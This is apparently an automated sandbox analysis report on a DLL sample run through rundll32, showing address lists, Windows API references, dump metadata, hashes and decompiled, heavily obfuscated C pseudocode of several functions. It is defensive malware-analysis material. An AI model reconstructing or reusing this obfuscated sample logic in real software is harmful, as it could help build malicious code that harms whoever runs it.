                0x7ffa535f5b33
                0x7ffa535f5b41
                0x7ffa535f5b48
                0x7ffa535f5b53
                0x7ffa535f5b5a
                0x7ffa535f5b62
                0x7ffa535f5b7e
                0x7ffa535f5b83
                0x7ffa535f5b92
                0x7ffa535f5ba6
                0x7ffa535f5ba9
                0x7ffa535f5bba
                0x7ffa535f5bbf
                0x7ffa535f5bcd
                0x7ffa535f5bdf
                0x7ffa535f5bef
                0x7ffa535f5c06
                0x7ffa535f5c2f
                0x7ffa535f5c39
                0x7ffa535f5c52
                0x7ffa535f5c63
                0x7ffa535f5c69
                0x7ffa535f5c6c
                0x7ffa535f5c77
                0x7ffa535f5c7d
                0x7ffa535f5c80
                0x7ffa535f5c9d
                0x7ffa535f5cc0
                0x7ffa535f5cce
                0x7ffa535f5cd2
                0x7ffa535f5cd9
                0x7ffa535f5ce5
                0x7ffa535f5cfc
                0x7ffa535f5d0d
                0x7ffa535f5d16
                0x7ffa535f5d1b
                0x7ffa535f5d1d
                0x7ffa535f5d20
                0x7ffa535f5d3c
                0x7ffa535f5d5f
                0x7ffa535f5d6d
                0x7ffa535f5d80
                0x7ffa535f5da3
                0x7ffa535f5db1
                0x7ffa535f5db3
                0x7ffa535f5dc5
                0x7ffa535f5dda
                0x7ffa535f5df0
                0x7ffa535f5e10
                0x7ffa535f5e1b
                0x7ffa535f5e3b
                0x7ffa535f5e49
                0x7ffa535f5e57
                0x7ffa535f5e6a
                0x7ffa535f5e70
                0x7ffa535f5e83
                0x7ffa535f5e93
                0x7ffa535f5ea3
                0x7ffa535f5ea7
                0x7ffa535f5eac
                0x7ffa535f5ec7
                0x7ffa535f5ed4
                0x7ffa535f5ed7
                0x7ffa535f5edd
                0x7ffa535f5ee4
                0x7ffa535f5ef4
                0x7ffa535f5f08
                0x7ffa535f5f0e
                0x7ffa535f5f16
                0x7ffa535f5f22
                0x7ffa535f5f2a
                0x7ffa535f5f3c
                0x7ffa535f5f4c
                0x7ffa535f5f6f
                0x7ffa535f5fa7
                0x7ffa535f5fae
                0x7ffa535f5fbb
                0x7ffa535f5fc6
                0x7ffa535f5fd1
                0x7ffa535f5fe2
                0x7ffa535f5fe8
                0x7ffa535f5ff4
                0x7ffa535f5ffd
                0x7ffa535f602b

                APIs
                • SetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,00000651,FFFFE791,00000000,?,?,00007FFA535E1FB9), ref: 00007FFA535F5ED7
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: AttributesFile
                • String ID:
                • API String ID: 3188754299-0
                • Opcode ID: 6b0a8843299c2e86402d5fd0ebcadc2bbfed71392822bb86e31921b7a36e54c3
                • Instruction ID: 7310299deb443c087b19cebb6579f40d15bf9f590e184c460fe133706274a8da
                • Opcode Fuzzy Hash: 6b0a8843299c2e86402d5fd0ebcadc2bbfed71392822bb86e31921b7a36e54c3
                • Instruction Fuzzy Hash: 7D1264B2314B859BDB68CB29D5847E9B7A9F788B84F049126DB9D43750DF38E5A0CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535F615C Relevance: 1.7, APIs: 1, Instructions: 199pipeCOMMONCrypto
                Download Yara Rule
                C-Code - Quality: 94%
                			E00007FFA7FFA535F615C(void* __eax, void* __ebx, long long __rbx, void* __rcx, long long __rdx, void* __r8, void* __r9) {
				void* __rsi;
				void* __rbp;
				signed int _t148;
				signed int _t152;
				signed int _t156;
				intOrPtr _t159;
				signed long long _t163;
				signed int _t164;
				void* _t181;
				long long _t202;
				signed long long _t220;
				void* _t229;
				void* _t231;
				void* _t233;
				void* _t235;
				void* _t236;
				long long* _t241;
				void* _t245;
				void* _t249;

				_t202 = __rbx;
				 *((long long*)(_t235 + 0x10)) = __rbx;
				_push(_t233);
				_push(_t231);
				_push(_t229);
				_push(_t245);
				_t236 = _t235 - 0x90;
				r11d = __r8 - 0x9c7;
				r10d =  *(_t236 + 0xf8);
				 *(_t236 + 0xe8) =  *(_t236 + 0x110) + 0xffffee0f;
				 *(_t236 + 0xf8) = r11d;
				r9d =  *(_t236 + 0xf0);
				r14d = _t181 - 0x2dd;
				_t148 = _t181 + 0xd1;
				 *(_t236 + 0xd0) = __r9 - 0x157a;
				 *(_t236 + 0x110) = r14d;
				r10d = r10d + 0xfffffed1;
				 *(_t236 + 0x108) = _t148;
				_t159 = __r9 - 0x8e8;
				 *((intOrPtr*)(_t236 + 0x80)) = _t159;
				_t164 = __r9 + 0x154;
				 *(_t236 + 0xe0) = _t164;
				r9d = __r8 - 0x1582;
				 *(_t236 + 0xf0) = r9d;
				if (_t159 == _t233 + 0x2114) goto 0x535f654b;
				if (r9d - __rdx + 0x145c >= 0) goto 0x535f6323;
				_t241 = __rdx + 0x620;
				 *(_t236 + 0x30) =  *(_t236 + 0x30) & 0x00000000;
				 *(__rdx + 0x128) = 0x19f;
				 *(_t236 + 0x28) = 0x8000000;
				 *( *((intOrPtr*)(__rdx + 0x5e8)) + 0x140) =  *( *((intOrPtr*)(__rdx + 0x5e8)) + 0x140) |  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x5e8)) + 0x3b8)) + 0x00001ec0;
				 *(__rdx + 0x38c) =  *(__rdx + 0x38c) & 0x00000000;
				 *((intOrPtr*)(__rdx + 0x388)) =  *((intOrPtr*)(__rdx + 0x348));
				 *((long long*)(__rdx + 0xf8)) =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0xb8)) + 0x3c)) +  *((intOrPtr*)(__rdx + 0xb8));
				 *((long long*)(__rdx + 0x3b0)) =  *((intOrPtr*)(__rdx + 0x288));
				 *_t241 =  *((intOrPtr*)( *((intOrPtr*)(__rdx + 0x5e8)) + 0x70)) - 0x1487;
				 *((long long*)( *((intOrPtr*)(__rdx + 0x20)) + 0x3a0)) =  *((long long*)( *((intOrPtr*)(__rdx + 0x20)) + 0x3a0)) + 0xca2;
				r8d =  *( *((intOrPtr*)(__rdx + 0x20)) + 0x1b0);
				r8d = r8d - 0x1f9a;
				 *(_t236 + 0x20) = r8d;
				r8d = 0;
				_t152 =  *( *((intOrPtr*)(__rdx + 0x5e8)) + 0x148) ^ 0x0000135b;
				 *((intOrPtr*)(__rdx + 0x404)) =  *((intOrPtr*)(__rdx + 0x3b0))();
				goto 0x535f650b;
				if ( *(__rdx + 0x2a8) != _t152 -  *((intOrPtr*)(__rdx + 0x368))) goto 0x535f650b;
				if (_t152 - r9d - _t148 + __rcx - 0x89a + 0x9c9 > 0) goto 0x535f637b;
				DisconnectNamedPipe(_t249);
				_t156 =  *(_t236 + 0xd0);
				r9d =  *(_t236 + 0xf0);
				r11d =  *(_t236 + 0xf8);
				if ( *((intOrPtr*)(__rdx + 0x188)) != ( *((intOrPtr*)(__rdx + 0x1d0)) + _t164) * 0x1320) goto 0x535f650b;
				r13d =  *((intOrPtr*)(__rdx + 0x230));
				r11d = r11d & 0x00001582;
				r8d =  *(__rdx + 0x248);
				r10d =  *(__rdx + 0x3b8);
				r8d = r8d | r14d;
				r10d = r10d - 0x1ad7;
				r15d =  *(__rdx + 0x28);
				r15d = r15d & r9d;
				r13d = r13d -  *(__rdx + 0xa0);
				r13d = r13d + _t156;
				r8d = r8d ^ 0x00000651;
				r14d = ( *(__rdx + 0x318) ^  *(__rdx + 0x240)) * 0x11f1;
				 *(_t236 + 0xf8) = r11d;
				r11d = r9d;
				r9d = r9d *  *(_t236 + 0x110);
				r11d = r11d & 0x00002114;
				 *((intOrPtr*)(_t236 + 0x78)) =  *(_t236 + 0x110) * _t156 + 0x1320;
				 *(_t236 + 0x70) = r10d;
				 *(_t236 + 0x68) =  *(__rdx + 0x80) ^  *(_t236 + 0xe0);
				 *(_t236 + 0x60) =  *(_t236 + 0xf8);
				 *(_t236 + 0x58) =  *(__rdx + 0x2a8) + 0x00000932 & 0x000012ad;
				 *((intOrPtr*)(_t236 + 0x50)) =  *((intOrPtr*)(__rdx + 0x440)) - 0x651;
				 *((long long*)(_t236 + 0x48)) = __rdx;
				 *(_t236 + 0x40) =  *(__rdx + 0x40) &  *(_t236 + 0x108);
				 *((intOrPtr*)(_t236 + 0x38)) = r13d;
				 *(_t236 + 0xf0) = r9d;
				r9d = _t156 | 0x00001ba7;
				 *(_t236 + 0x30) = r14d;
				 *(_t236 + 0x28) = r15d;
				 *(_t236 + 0x20) = r11d;
				E00007FFA7FFA535F9404( *(_t236 + 0xf8),  *(__rdx + 0x80) ^  *(_t236 + 0xe0), _t245 + 0x145c,  *(_t236 + 0xf0),  *((intOrPtr*)(__rdx + 0x440)) - 0x651,  *(__rdx + 0x40) &  *(_t236 + 0x108), __rbx, __rdx, _t231, __r8, _t241);
				_t163 =  *((intOrPtr*)(_t236 + 0x80));
				 *(__rdx + 0x2a0) =  *(__rdx + 0x2a0) * (( *(__rdx + 0x58) &  *(_t236 + 0xe8)) + 0x651);
				 *(__rdx + 0x2d0) =  *(__rdx + 0x5d8) ^ 0x00000bbb;
				_t102 = _t202 - 0x1625; // -5669
				if (_t163 - _t102 < 0) goto 0x535f65b2;
				if ( *((intOrPtr*)(__rdx + 0x404)) == 0) goto 0x535f65b2;
				 *( *((intOrPtr*)(__rdx + 0x358)) + 0x5e0) =  *( *((intOrPtr*)(__rdx + 0x20)) + 0x390) * 0x1ad7;
				goto 0x535f65b8;
				_t220 = _t163;
				if ( *((intOrPtr*)(__rdx + 0x2f8)) - ( *(__rdx + 0x128) ^ _t220) + 0x145c <= 0) goto 0x535f65b2;
				if ( *((intOrPtr*)(__rdx + 0x110)) - ( *(__rdx + 0x2a0) | _t220) <= 0) goto 0x535f65b2;
				 *(__rdx + 0x3b8) =  *(__rdx + 0x3b8) ^ _t241 + 0x00001582 +  *((intOrPtr*)(__rdx + 0x298));
				 *(__rdx + 0xa0) =  *(__rdx + 0xa0) |  *(__rdx + 0x2a8) * 0x000011f1 ^ r11d;
				return _t229 + 0x68e;
			}






















                0x7ffa535f615c
                0x7ffa535f615c
                0x7ffa535f6161
                0x7ffa535f6162
                0x7ffa535f6163
                0x7ffa535f6166
                0x7ffa535f616c
                0x7ffa535f6187
                0x7ffa535f618e
                0x7ffa535f619f
                0x7ffa535f61ad
                0x7ffa535f61b5
                0x7ffa535f61bd
                0x7ffa535f61c4
                0x7ffa535f61ca
                0x7ffa535f61d7
                0x7ffa535f61df
                0x7ffa535f61e6
                0x7ffa535f61ed
                0x7ffa535f61f4
                0x7ffa535f61fb
                0x7ffa535f6202
                0x7ffa535f6209
                0x7ffa535f6210
                0x7ffa535f621a
                0x7ffa535f6229
                0x7ffa535f6237
                0x7ffa535f623f
                0x7ffa535f624d
                0x7ffa535f625f
                0x7ffa535f6274
                0x7ffa535f6287
                0x7ffa535f629b
                0x7ffa535f62a6
                0x7ffa535f62c1
                0x7ffa535f62ce
                0x7ffa535f62d4
                0x7ffa535f62e4
                0x7ffa535f62f3
                0x7ffa535f62fa
                0x7ffa535f62ff
                0x7ffa535f6308
                0x7ffa535f6316
                0x7ffa535f631e
                0x7ffa535f6336
                0x7ffa535f6345
                0x7ffa535f635e
                0x7ffa535f6364
                0x7ffa535f636b
                0x7ffa535f6373
                0x7ffa535f6398
                0x7ffa535f639e
                0x7ffa535f63a6
                0x7ffa535f63bd
                0x7ffa535f63c5
                0x7ffa535f63dc
                0x7ffa535f63e7
                0x7ffa535f63ee
                0x7ffa535f6401
                0x7ffa535f640f
                0x7ffa535f6424
                0x7ffa535f642e
                0x7ffa535f6435
                0x7ffa535f644c
                0x7ffa535f6454
                0x7ffa535f6457
                0x7ffa535f6460
                0x7ffa535f646c
                0x7ffa535f6477
                0x7ffa535f647c
                0x7ffa535f6480
                0x7ffa535f6484
                0x7ffa535f6488
                0x7ffa535f648c
                0x7ffa535f6491
                0x7ffa535f6495
                0x7ffa535f649a
                0x7ffa535f64a2
                0x7ffa535f64ac
                0x7ffa535f64b1
                0x7ffa535f64b6
                0x7ffa535f64bb
                0x7ffa535f64cf
                0x7ffa535f64ec
                0x7ffa535f6503
                0x7ffa535f650b
                0x7ffa535f6513
                0x7ffa535f6522
                0x7ffa535f6540
                0x7ffa535f6549
                0x7ffa535f6553
                0x7ffa535f6567
                0x7ffa535f657c
                0x7ffa535f6590
                0x7ffa535f65aa
                0x7ffa535f65d2

                APIs
                • DisconnectNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00007FFA535F635E
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: DisconnectNamedPipe
                • String ID:
                • API String ID: 797972925-0
                • Opcode ID: 17d992a7432668e4eb444aa07ec58e46677ea7302fb7bbe7f68e0d605f58bee4
                • Instruction ID: 47890ce1e09b5a669ff8df59b86377a81bb2d4d389a92553468a53c5b71d6706
                • Opcode Fuzzy Hash: 17d992a7432668e4eb444aa07ec58e46677ea7302fb7bbe7f68e0d605f58bee4
                • Instruction Fuzzy Hash: 7AB16273614AD58AD764CF14E088FEE77A9F388788F024126DB8A57B54EB38D598CB04
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E79EC Relevance: 1.4, Strings: 1, Instructions: 139COMMONLIBRARYCODECrypto
                Download Yara Rule
                C-Code - Quality: 55%
                			E00007FFA7FFA535E79EC(long long __rbx, signed long long*** __rcx, long long __rdi, signed long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t28;
				signed int _t56;
				void* _t57;
				void* _t59;
				void* _t70;
				signed long long _t71;
				void* _t76;
				signed int* _t82;
				signed long long _t84;
				signed long long _t86;
				signed long long _t87;
				signed long long _t103;
				signed long long _t104;
				signed long long _t106;
				signed long long _t112;
				signed long long _t114;
				void* _t123;
				signed long long _t126;
				signed long long _t127;
				signed long long _t128;
				signed long long* _t133;
				void* _t134;
				signed long long _t138;
				signed long long*** _t141;

				_t114 = __rsi;
				_t70 = _t123;
				 *((long long*)(_t70 + 8)) = __rbx;
				 *((long long*)(_t70 + 0x10)) = __rbp;
				 *((long long*)(_t70 + 0x18)) = __rsi;
				 *((long long*)(_t70 + 0x20)) = __rdi;
				_push(_t134);
				_t71 =  *((intOrPtr*)(__rcx));
				_t141 = __rcx;
				_t82 =  *_t71;
				if (_t82 != 0) goto 0x535e7a21;
				goto 0x535e7ba7;
				_t126 =  *0x53754140; // 0x9bd95a2971b4
				r12d = 0x40;
				_t119 =  *_t82 ^ _t126;
				asm("dec eax");
				_t84 = _t82[4] ^ _t126;
				asm("dec ecx");
				asm("dec eax");
				if ((_t82[2] ^ _t126) != _t84) goto 0x535e7b21;
				_t86 = _t84 - ( *_t82 ^ _t126) >> 3;
				_t109 =  >  ? _t71 : _t86;
				_t110 = ( >  ? _t71 : _t86) + _t86;
				_t111 =  ==  ? _t71 : ( >  ? _t71 : _t86) + _t86;
				if (( ==  ? _t71 : ( >  ? _t71 : _t86) + _t86) - _t86 < 0) goto 0x535e7aa0;
				r8d = _t134 - 0x38;
				E00007FFA7FFA535EF334(_t134 - 0x20, r8d & 0x0000003f, _t57, _t59, _t86, _t119,  ==  ? _t71 : ( >  ? _t71 : _t86) + _t86, __rsi, _t119, _t126);
				_t28 = E00007FFA7FFA535E7E58(_t71, _t119);
				if (_t71 != 0) goto 0x535e7ac8;
				_t112 = _t86 + 4;
				r8d = 8;
				E00007FFA7FFA535EF334(_t28, 0, _t57, _t59, _t86, _t119, _t112, _t114, _t119, _t126);
				_t138 = _t71;
				E00007FFA7FFA535E7E58(_t71, _t119);
				if (_t138 == 0) goto 0x535e7a19;
				_t127 =  *0x53754140; // 0x9bd95a2971b4
				_t133 = _t138 + _t86 * 8;
				_t87 = _t138 + _t112 * 8;
				asm("dec eax");
				_t76 =  >  ? _t114 : _t87 - _t133 + 7 >> 3;
				if (_t76 == 0) goto 0x535e7b21;
				 *_t133 = _t114 ^ _t127;
				if (_t114 + 1 != _t76) goto 0x535e7b0b;
				_t128 =  *0x53754140; // 0x9bd95a2971b4
				asm("dec eax");
				 *_t133 =  *(_t141[1]) ^ _t128;
				_t103 =  *0x53754140; // 0x9bd95a2971b4
				asm("dec eax");
				 *( *( *_t141)) = _t138 ^ _t103;
				_t104 =  *0x53754140; // 0x9bd95a2971b4
				asm("dec ecx");
				( *( *_t141))[1] =  &(_t133[1]) ^ _t104;
				_t106 =  *0x53754140; // 0x9bd95a2971b4
				r12d = r12d - (_t56 & 0x0000003f);
				asm("dec eax");
				( *( *_t141))[2] = _t87 ^ _t106;
				return 0;
			}



























                0x7ffa535e79ec
                0x7ffa535e79ec
                0x7ffa535e79ef
                0x7ffa535e79f3
                0x7ffa535e79f7
                0x7ffa535e79fb
                0x7ffa535e79ff
                0x7ffa535e7a09
                0x7ffa535e7a0e
                0x7ffa535e7a11
                0x7ffa535e7a17
                0x7ffa535e7a1c
                0x7ffa535e7a21
                0x7ffa535e7a28
                0x7ffa535e7a3f
                0x7ffa535e7a45
                0x7ffa535e7a48
                0x7ffa535e7a4b
                0x7ffa535e7a4e
                0x7ffa535e7a54
                0x7ffa535e7a62
                0x7ffa535e7a6c
                0x7ffa535e7a75
                0x7ffa535e7a78
                0x7ffa535e7a7f
                0x7ffa535e7a81
                0x7ffa535e7a8c
                0x7ffa535e7a96
                0x7ffa535e7a9e
                0x7ffa535e7aa0
                0x7ffa535e7aa4
                0x7ffa535e7ab0
                0x7ffa535e7ab7
                0x7ffa535e7aba
                0x7ffa535e7ac2
                0x7ffa535e7ac8
                0x7ffa535e7acf
                0x7ffa535e7ad6
                0x7ffa535e7ae5
                0x7ffa535e7b02
                0x7ffa535e7b09
                0x7ffa535e7b0e
                0x7ffa535e7b18
                0x7ffa535e7b1a
                0x7ffa535e7b36
                0x7ffa535e7b40
                0x7ffa535e7b43
                0x7ffa535e7b56
                0x7ffa535e7b5f
                0x7ffa535e7b65
                0x7ffa535e7b76
                0x7ffa535e7b7f
                0x7ffa535e7b83
                0x7ffa535e7b8f
                0x7ffa535e7b98
                0x7ffa535e7ba3
                0x7ffa535e7bc5

                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID:
                • String ID: @
                • API String ID: 0-2766056989
                • Opcode ID: 346c1b88be02117be7f8758ca781b98ccd176a27ae5bec0610294ea7b2f87f69
                • Instruction ID: 2c46296e4e1b5cc163ff478d42538fcc9473e764801508986ddf6f8428a528ef
                • Opcode Fuzzy Hash: 346c1b88be02117be7f8758ca781b98ccd176a27ae5bec0610294ea7b2f87f69
                • Instruction Fuzzy Hash: 7C41B262B25F448AEA08CF2AE4141A967A6BB99FC0B4DE036DE0D97754EE3CD442C300
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535EF3D4 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E00007FFA7FFA535EF3D4(long long __rax) {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x53755748 = __rax;
				return _t3 & 0xffffff00 | __rax != 0x00000000;
			}




                0x7ffa535ef3d8
                0x7ffa535ef3e1
                0x7ffa535ef3ef

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.523704677.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 00000002.00000002.523690784.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523724243.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523835126.00007FFA5367C000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523946473.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000002.00000002.523958296.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: HeapProcess
                • String ID:
                • API String ID: 54951025-0
                • Opcode ID: 09493c902aeff8137d99b67d99ae24fca8f81e13b04488db06bc56ce794d1363
                • Instruction ID: 0cfb4fbe83daadb556de3732b62e142eb54f42bf669103b4c5501ce449a3232d
                • Opcode Fuzzy Hash: 09493c902aeff8137d99b67d99ae24fca8f81e13b04488db06bc56ce794d1363
                • Instruction Fuzzy Hash: 68B09220E27F06C7EA086B156C8261822AAAF99710F9C9478C00DA0320DE2C20EA9700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535FAA40 Relevance: .2, Instructions: 235COMMONCrypto
                Download Yara Rule
                C-Code - Quality: 100%
                			E00007FFA7FFA535FAA40(void* __eax, void* __edx, void* __ebp, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r10, void* __r11) {
				void* __rbx;
				void* __rsi;
				void* __rbp;
				signed int _t147;
				signed int _t156;
				signed int _t170;
				signed int _t173;
				signed int _t177;
				signed int _t180;
				signed int _t183;
				intOrPtr _t200;
				long long _t201;
				signed long long _t206;
				signed long long _t219;
				signed long long _t223;
				void* _t227;
				intOrPtr _t229;
				long long _t235;
				signed long long _t245;
				signed long long _t248;
				void* _t257;
				void* _t258;
				intOrPtr _t260;
				intOrPtr _t261;
				void* _t268;

				_t268 = __r11;
				r10d =  *(_t258 + 0x128);
				r14d = __r8 - 0x12ad;
				r8d =  *(_t258 + 0x148);
				r15d = __rcx + 0x1a1;
				r10d = r10d + 0xffffece0;
				_t170 = __edx + 0xffffeaeb;
				_t156 =  *(_t258 + 0x140) + 0xfffff567;
				r9d = r9d + 0xfffff57b;
				 *(_t258 + 0x84) = r10d;
				_t183 =  *(_t258 + 0x160) + 0xffffea86;
				 *(_t258 + 0x100) = r14d;
				_t177 = __r8 - 0x68e;
				 *(_t258 + 0xf8) = _t170;
				_t173 = __r8 - 0x1320;
				 *(_t258 + 0x108) = _t177;
				r11d = __r8 - 0x73;
				 *(_t258 + 0xf0) = _t173;
				_t260 =  *((intOrPtr*)(_t258 + 0x158));
				 *((intOrPtr*)(_t258 + 0x88)) = r11d;
				 *(_t258 + 0x148) = _t156;
				 *(_t258 + 0x128) = r9d;
				 *(_t258 + 0x80) = r15d;
				 *(_t258 + 0x140) = _t183;
				if (r14d ==  *(_t258 + 0x168) + 0xffffe464) goto 0x535fadcf;
				if (_t156 == __r9 + 0x12f) goto 0x535fabcd;
				_t200 =  *((intOrPtr*)(_t260 + 0x498));
				if (_t200 != 0) goto 0x535fab3c;
				goto 0x535faf0b;
				_t201 = _t200 + 0xc130;
				r10d = r10d + 0x16ce;
				 *((long long*)(_t260 + 0x4c0)) = _t201;
				if (_t201 != 0xffffffff) goto 0x535fab74;
				_t229 =  *((intOrPtr*)(_t260 + 0x110));
				 *((intOrPtr*)(_t260 + 0x138)) =  *((intOrPtr*)(_t260 + 0x138)) -  *((intOrPtr*)(_t229 + 0x3b8));
				 *((long long*)(_t229 + 0x3b8)) =  *((long long*)(_t229 + 0x3b8)) - 1;
				goto 0x535fab35;
				 *((char*)(_t260 + 0x4c8)) = 0;
				 *(_t260 + 0x188) = 0x1bbf;
				 *(_t260 + 0x158) =  *(_t260 + 0x158) |  *( *((intOrPtr*)(_t260 + 0x358)) + 0xa0) | 0x00001c76;
				 *(_t260 + 0x5f0) =  *(_t260 + 0x5f0) & 0x00000000;
				 *((intOrPtr*)( *((intOrPtr*)(_t260 + 0x20)) + 0x130)) =  *((intOrPtr*)( *((intOrPtr*)(_t260 + 0x20)) + 0x130)) +  *((intOrPtr*)( *((intOrPtr*)(_t260 + 0x20)) + 0x168));
				 *((long long*)( *((intOrPtr*)(_t260 + 0x20)) + 0x168)) =  *((long long*)( *((intOrPtr*)(_t260 + 0x20)) + 0x168)) + 1;
				goto 0x535fadcf;
				_t206 = _t170;
				r9d = r10d;
				 *(_t258 + 0x90) = _t206;
				 *(_t258 + 0x160) = r10d;
				if (r10d - (_t206 ^  *(_t260 + 0x3a0)) > 0) goto 0x535fadc7;
				_t235 = _t170 * 0x2114;
				 *((long long*)(_t258 + 0x98)) = _t235;
				if ( *((intOrPtr*)(_t260 + 0x110)) - _t235 < 0) goto 0x535fad87;
				r14d =  *(_t260 + 0x178) * 0x1ba7;
				r13d =  *(_t260 + 0x2a8);
				r11d = __rdx + 0x11f1;
				r12d = _t177;
				 *(_t260 + 0x148) =  *(_t260 + 0x148) |  *(_t260 + 0x248) * 0x000012ad ^  *(_t260 + 0x2a0);
				r13d = r13d ^  *(_t260 + 0x188);
				r13d = r13d + _t183;
				r14d = r14d + _t173;
				r9d =  *(_t260 + 0x190);
				r12d = r12d -  *((intOrPtr*)(_t260 + 0x230));
				r10d =  *(_t258 + 0x140);
				r10d = r10d ^  *(_t258 + 0x148);
				 *(_t258 + 0x78) = r10d;
				 *((intOrPtr*)(_t258 + 0x70)) =  *((intOrPtr*)(_t260 + 0x4b8)) +  *((intOrPtr*)(_t260 + 0x108));
				 *((intOrPtr*)(_t258 + 0x68)) =  *((intOrPtr*)(_t260 + 0x110)) + 0x2114;
				 *((intOrPtr*)(_t258 + 0x60)) = r11d;
				 *(_t258 + 0x168) =  *(_t260 + 0x128) ^ _t156;
				 *(_t258 + 0x58) =  *(_t260 + 0x3c8) *  *(_t260 + 0xd8) & _t173;
				 *(_t258 + 0x50) = r14d;
				r9d = r9d * r15d;
				r15d = _t170;
				r15d = r15d -  *(_t260 + 0x2a0);
				r8d =  *(_t258 + 0xf0);
				r8d = r8d - _t170;
				 *((long long*)(_t258 + 0x48)) =  *((intOrPtr*)(_t258 + 0x158));
				 *(_t258 + 0x40) = r15d;
				 *(_t258 + 0x38) = r12d;
				 *(_t258 + 0x30) = r13d;
				 *(_t258 + 0x28) =  *(_t260 + 0x420) * _t170 ^  *(_t260 + 0x3b8);
				 *(_t258 + 0x20) = ( *(_t258 + 0x100) - _t173) * 0x15fd;
				_t147 = E00007FFA7FFA535F9404( *(_t258 + 0x128) + _t170,  *((intOrPtr*)(_t260 + 0x4b8)) +  *((intOrPtr*)(_t260 + 0x108)),  *(_t258 + 0x168), ( *(_t258 + 0x128) + _t170) * 0x181f,  *((intOrPtr*)(_t260 + 0x110)) + 0x2114,  *(_t260 + 0x3c8) *  *(_t260 + 0xd8) & _t173, _t227, __rdx, _t257, _t260, __r10);
				_t261 =  *((intOrPtr*)(_t258 + 0x158));
				r9d =  *(_t258 + 0x160);
				_t180 =  *(_t258 + 0x108);
				r15d =  *(_t258 + 0x80);
				 *(_t258 + 0x148) = _t147;
				r9d = r9d + 1;
				 *(_t258 + 0x160) = r9d;
				if (r9d - ( *(_t258 + 0x90) ^  *(_t261 + 0x3a0)) <= 0) goto 0x535fac0d;
				r10d =  *(_t258 + 0x84);
				r11d =  *((intOrPtr*)(_t258 + 0x88));
				r9d =  *(_t258 + 0x128);
				if ( *(_t258 + 0x140) - _t268 + 0x2d5 > 0) goto 0x535fae39;
				 *( *(_t261 + 0x468)) =  *( *((intOrPtr*)(_t261 + 0x108)) + 0x1b0) ^ 0x4d747a9d;
				 *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x240)) + 0x138)) =  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x240)) + 0x138)) + (M00007FFA7FFA5366FCCE & 0x000000ff) - 0x1ba7;
				 *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x358)) + 0x130)) =  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x358)) + 0x130)) + ( *( *((intOrPtr*)(_t261 + 0x20)) + 0x1b0) ^ 0x000015fd);
				goto 0x535faf04;
